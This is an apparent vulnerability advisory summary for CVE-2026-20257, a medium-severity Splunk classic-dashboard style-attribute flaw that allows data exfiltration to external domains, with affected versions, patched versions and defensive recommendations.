PatchSiren cyber security CVE debrief
CVE-2026-20257 Splunk CVE debrief
A vulnerability was found in Splunk Enterprise and Splunk Cloud Platform. A low-privileged user could craft a classic dashboard that exfiltrates sensitive data from the browser of a higher-privileged user who views it. This is possible because classic dashboard panels do not fully validate style attribute values, allowing requests to reach external domains outside the configured Trusted Domains List.
- Vendor
- Splunk
- Product
- Splunk Enterprise
- CVSS
- MEDIUM 5.7
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-06-10
- Original CVE updated
- 2026-06-10
- Advisory published
- 2026-06-10
- Advisory updated
- 2026-06-10
Who should care
Administrators and users of Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132.
Technical summary
The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The low-privileged user should not be able to exploit the vulnerability at will. The CVSS score for this vulnerability is 5.7, with a severity rating of MEDIUM.
Defensive priority
MEDIUM
Recommended defensive actions
- Update Splunk Enterprise to version 10.2.4, 10.0.7, 9.4.12, or 9.3.13, or later.
- Update Splunk Cloud Platform to version 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, or 9.3.2411.132, or later.
- Restrict access to classic dashboards to only trusted users.
- Configure the Trusted Domains List to only include necessary external domains.
Evidence notes
The CVE record was published on June 10, 2026, and last modified on June 10, 2026.
Official resources
-
CVE-2026-20257 CVE record
CVE.org
-
CVE-2026-20257 NVD detail
NVD
-
Source item URL
nvd_modified
- Source reference
CVE-2026-20257 was published on 2026-06-10T18:16:41.257Z.